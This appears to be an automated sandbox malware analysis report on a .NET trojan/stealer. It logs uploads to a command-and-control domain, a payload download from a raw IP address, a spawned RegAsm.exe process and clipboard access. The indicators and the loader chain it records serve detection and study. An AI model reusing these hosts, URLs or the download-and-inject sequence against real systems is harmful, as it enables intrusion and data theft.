        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: sector-essay.cyou
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 52; Host: sector-essay.cyou
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=BF8HSG09; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12780; Host: sector-essay.cyou
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=URWJUSLA0OTC7DX0W; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15076; Host: sector-essay.cyou
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=IT1UG7M6MS1IK92F; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20560; Host: sector-essay.cyou
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=Q50S24M0B9; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1208; Host: sector-essay.cyou
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=7YVFSTRYYY2P; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 569419; Host: sector-essay.cyou
        Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 87; Host: sector-essay.cyou
        Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
        Source: global traffic | HTTP traffic detected: GET /infopage/tvh53.exe HTTP/1.1; X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq; Host: 147.45.44.131; Connection: Keep-Alive
        Source: global traffic | DNS traffic detected: DNS query: sector-essay.cyou
        Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: sector-essay.cyou
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/infopage/tvh53.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/infopage/tvh53.exeP
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.0000000001570000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou/
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou/5
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.0000000001570000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou/api
        Source: RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou/apiC
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou/apiO
        Source: RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou/apie
        Source: RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou/apij
        Source: RegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou:443/api
        Source: RegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sector-essay.cyou:443/apiMicrosoft
        Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00433A50 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard

        System Summary

        Source: ZjH6H6xqo7.exe, Sap.cs | Long String: Length: 18812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00439250
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00408A70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042E3BE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00441CB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00422D10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00409E21
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00438ED0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00420EF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004277C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00433820
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00406830
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042E03F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004098C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042E0CB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004288DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004288F8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00404880
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00430082
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004388B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004290B1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00424957
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00405917
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041990C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040E911
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004251D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042C9E3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042C1F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041B1FA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00406180
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042AA59
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00402A70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00440210
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042A235
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042FAD8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004402F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041E304
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041F3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0043C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042D304
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042AB83
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0043CB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004213AD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00425440
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00430C61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00409410
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00406CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00405CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00403490
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041C4BC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041FD50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00427D61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00428D61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042ED09
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040AD20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042EDCA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004255D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041CDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0043FDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042B580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004255A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004335B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00438650
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00408670
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00403E70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00419ECF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00418E83
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040B769
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00441720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00423F26
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041AFC2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0042C7C6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004077D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004297D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041A783
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041FF90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00431790
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00426F9E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00408450 appears 40 times
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameup5gphgh.dll4 vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2073668384.000000000118E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000000.2041679917.0000000000AEE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameHilif.exe, vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2075583120.0000000005CF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameup5gphgh.dll4 vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe | Binary or memory string: OriginalFilenameHilif.exe, vs ZjH6H6xqo7.exe
        Source: ZjH6H6xqo7.exe, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
        Source: ZjH6H6xqo7.exe, Sap.cs | Base64 encoded string: (value omitted)
        Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/7@1/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00439250 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZjH6H6xqo7.exe.log
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | File created: C:\Users\user\AppData\Local\Temp\up5gphgh
        Source: ZjH6H6xqo7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ZjH6H6xqo7.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: ZjH6H6xqo7.exe | ReversingLabs: Detection: 71%
        Source: ZjH6H6xqo7.exe | Virustotal: Detection: 65%
        Source: unknown | Process created: C:\Users\user\Desktop\ZjH6H6xqo7.exe "C:\Users\user\Desktop\ZjH6H6xqo7.exe"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: mscoree.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: rasapi32.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: rasman.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: rtutils.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: amsi.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
